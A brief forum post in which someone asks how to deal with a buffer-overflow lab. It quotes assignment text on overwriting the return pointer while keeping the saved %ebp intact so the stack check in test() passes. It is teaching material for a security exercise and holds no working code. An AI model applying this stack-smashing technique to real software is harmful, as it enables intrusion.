Posted on 2011-10-07
i'm working on a similar problem and don't understand how this issue was addressed, how did this affect this input string (or assembly code)?
*In order to overwrite the return pointer, you must also overwrite the saved value of %ebp. However, it is important that this value is correctly restored before you return to test. You can do this by either 1) making sure that your exploit string contains the correct value of the saved %ebp in the correct position, so that it never gets corrupted, or 2) restore the correct value as part of your exploit code. Youll see that the code for test() has some explicit tests to check for a corrupted stack.